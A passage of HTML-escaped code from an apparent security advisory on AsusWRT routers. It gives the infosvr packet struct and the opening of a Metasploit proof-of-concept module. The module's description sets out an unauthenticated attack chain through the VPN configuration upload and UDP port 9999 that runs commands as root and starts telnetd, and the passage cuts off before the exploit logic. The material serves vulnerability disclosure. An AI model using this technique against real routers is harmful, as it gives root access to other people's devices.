class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Header<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">iboxPKTEx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">ServiceID<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span 
class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">PacketType<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">WORD<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">OpCode<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">DWORD \t\t<\/span><span class=\"crayon-v\">Info<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ Or Transaction ID<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">MacAddress<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">Password<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/NULL terminated string, string length:1~31, cannot be NULL string<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ibox_comm_pkt_hdr_ex<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-13\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Body<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">iboxPKTCmd<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">WORD<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295040817832852-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">420<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295040817832852-18\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PKT_SYSCMD<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/ total 422 bytes<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- 
Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a66636295042778926259\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-1\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;msf\/core&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-3\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MetasploitModule<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Remote<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-4\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Rank<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ExcellentRanking<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5a66636295042778926259-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-6\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Remote<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">HttpClient<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-7\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Remote<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Udp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-9\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">initialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">super<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">update_info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-11\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Name'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'AsusWRT LAN Unauthenticated Remote Code Execution'<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Description'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-e\">q<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">HTTP <\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">AsusWRT <\/span><span class=\"crayon-i\">has<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">flaw <\/span><span class=\"crayon-e\">where <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-e\">allows <\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">unauthenticated <\/span><span class=\"crayon-e\">client <\/span><span class=\"crayon-st\">to<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">perform<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">POST <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">certain <\/span><span class=\"crayon-v\">cases<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">can <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">combined <\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">another <\/span><span class=\"crayon-e\">vulnerability <\/span><span class=\"crayon-st\">in<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">VPN <\/span><span class=\"crayon-e\">configuration <\/span><span class=\"crayon-e\">upload <\/span><span class=\"crayon-e\">routine <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">sets <\/span><span class=\"crayon-e\">NVRAM <\/span><span class=\"crayon-e\">configuration <\/span><span class=\"crayon-e\">variables <\/span><span class=\"crayon-e\">directly<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-16\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">POST <\/span><span class=\"crayon-e\">request <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">special <\/span><span class=\"crayon-e\">command <\/span><span class=\"crayon-v\">mode<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a66636295042778926259-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">command <\/span><span class=\"crayon-e\">mode <\/span><span class=\"crayon-e\">can <\/span><span class=\"crayon-st\">then<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">abused <\/span><span class=\"crayon-e\">by <\/span><span class=\"crayon-i\">sending<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">UDP <\/span><span class=\"crayon-e\">packet <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">infosvr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">which <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">running<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-18\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">port <\/span><span class=\"crayon-i\">UDP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">9999<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">directly <\/span><span class=\"crayon-e\">execute <\/span><span class=\"crayon-e\">commands <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">This<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit 
<\/span><span class=\"crayon-e\">leverages <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">start <\/span><span class=\"crayon-e\">telnetd <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">random <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">then<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connects <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">It <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-e\">been <\/span><span class=\"crayon-e\">tested <\/span><span class=\"crayon-e\">with <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">RT<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">AC68U <\/span><span class=\"crayon-e\">running <\/span><span class=\"crayon-e\">AsusWRT <\/span><span class=\"crayon-i\">Version<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.0.0.4.380.7743.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Author&#8217;<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Beyond Security'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># Vulnerability discovery and Metasploit module<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'License'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MSF_LICENSE<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'References'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span
class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'CVE'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'add later'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'Add'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'links'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Targets'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span
class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'AsusWRT &lt; (add fixed version later)'<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Payload'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Compat'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'PayloadType'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span
class=\"crayon-s\">'cmd_interact'<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'ConnectionType'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'find'<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\"
id=\"crayon-5a66636295042778926259-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Privileged'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Platform'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'unix'<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a66636295042778926259-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Arch'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARCH_CMD<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a66636295042778926259-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'DefaultOptions'<\/span><span class=\"crayon-h\"> 